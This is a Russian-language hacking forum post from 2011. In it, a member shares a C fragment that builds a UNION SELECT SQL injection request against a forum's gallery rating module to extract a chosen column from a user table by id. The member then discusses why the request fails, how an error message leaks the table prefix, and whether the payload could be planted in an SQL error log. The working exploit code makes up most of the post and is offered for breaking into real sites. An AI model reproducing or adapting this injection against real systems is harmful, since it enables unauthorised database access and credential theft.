08.06.2011, 11:23
|
|
Участник форума
Регистрация: 31.03.2008
Сообщений: 143
С нами:
9533255
Репутация:
95
|
|
C-r-A-c-K, есть еще скуль иньекция:
Код:
strcpy(exploit, "GET /");
strcat(exploit, path);
strcat(exploit, "?automodule=gallery&cmd=rate&img=1&rating=1&album=-1%20union%20select%201,");
strcat(exploit, column);
strcat(exploit, ",1,1,1,1,1,1,1,1%20FROM%20");
strcat(exploit, prefix);
strcat(exploit, table);
strcat(exploit, "%20WHERE%20id=");
strcat(exploit, id);
strcat(exploit, "/*31337*/");
strcat(exploit, " HTTP/1.0\r\nHost: ");
strcat(exploit, host);
strcat(exploit, "\r\n\r\n");
Exploit(exploit, "sqlinject", host);
при правильно обращении меня кидает на форум и пишет что-то типа что у меня нет прав...
при неправильном запросе выскакивает ошибка, показывает префикс и.т.д
в правильном запросе запись могла попасть в sql_error_log с желаемым содержимым?
sql_error_log вообще есть в 2.1.7? не смог найти |
|
|